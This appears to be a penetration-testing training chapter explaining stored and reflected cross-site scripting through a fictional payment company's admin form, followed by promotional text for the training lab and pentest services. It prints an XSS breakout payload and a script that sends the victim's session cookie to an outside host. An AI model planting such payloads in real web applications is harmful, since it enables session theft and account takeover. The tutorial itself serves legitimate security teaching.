Cross-Site Scripting (XSS)

In addition to SQL injection, injection attacks also include cross-site scripting. Due to the lack of input validation, cross-site scripting allows any script code to be inserted in the web application, which is then executed by the victim’s browser. Similar to the SQL injection scenario, we will look at all input ﬁelds that could be embedded in the HTML code to identify XSS vulnerabilities. These could be shopping items in a shopping cart, application settings or blog entries. Let’s run through the following scenario as an example, which does not work in the practice lab:

Administrator users can be created and administered in the appointments calendar of Dubius Payment Ltd.:

The last name of a user is output via HTML:

<input name="lname" size="30" type="text" value=“Pitts">

If we as an attacker want to embed JavaScript in the above parameter lname, we need to observe its embedding in the HTML code: the statement Pitts ends with quotation marks (“) and an angle bracket (>). In order to have a notiﬁcation box pop up, for example, we can use the following string as the last name in the form above:

Pitts“><script>alert(’XSS’)</script>

For each request of this page, the following notiﬁcation box would pop up, as our JavaScript has been saved and is output via HTML:

A notiﬁcation box is a Proof of Concept (PoC) for us as a penetration tester, but it is too harmless in the hands of an attacker. Instead of the notiﬁcation box, we may also steal the user session cookie, for which the following code snipped can be used, for example:

  <script> 
    new Image().src=“ http://10.20.1.14/ ?c="+document.cookie;  
  </script>

There are basically several types of XSS. In the above scenario, we had a so-called stored cross-site scripting vulnerability available to us, as our JavaScript code was stored on the server. If our JavaScript had not been stored by the target system and had been executed only once, we would have identiﬁed a reﬂected cross-site scripting vulnerability. With this type, we would still have to deliver our malicious request to a user of the web application. In one of its cheat sheets, OWASP lists several interesting techniques on how to plant JavaScript into a web application in order to exploit XSS: https://cheatsheetseries.owasp.org/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html

Pentest Training

Take a look at the pentest training chapters and learn penetration testing:

binsec academy GmbH – Advanced Pentest Training Lab

binsec academy GmbH operates the Pentest Training Lab, a highly practical online platform dedicated to real penetration testing. Simulating complex corporate networks and advanced real-world attack scenarios within isolated lab environments, it is engineered to sharpen the skills of aspiring and professional penetration testers. Upon conquering our rigorous, fully practical examination, participants earn the distinguished Binsec Academy Certified Pentest Professional (BACPP) designation — proving their technical capability to methodically uncover and evaluate vulnerabilities in modern IT infrastructures.

Explore the Pentest Training Lab

binsec GmbH – Experts in Penetration Testing

As the operative pentesting core of the binsec group, binsec GmbH has provided high-end, human-led penetration testing since 2013. Rejecting automated scans, our permanently employed, certified senior pentest experts deliver manual deep-dive assessments of web applications, APIs, mobile apps, complex network infrastructures, cloud environments, and advanced red team simulations. Specializing in high-regulation sectors like Payment, Banking, and Healthcare, we provide clear risk evaluations and actionable reports to effectively assess your business-critical systems.

Get Manual Expert Penetration Testing Services

Cross-Site Scripting (XSS)

Pentest Training

binsec academy GmbH – Advanced Pentest Training Lab

binsec GmbH – Experts in Penetration Testing

Contact

Legal notice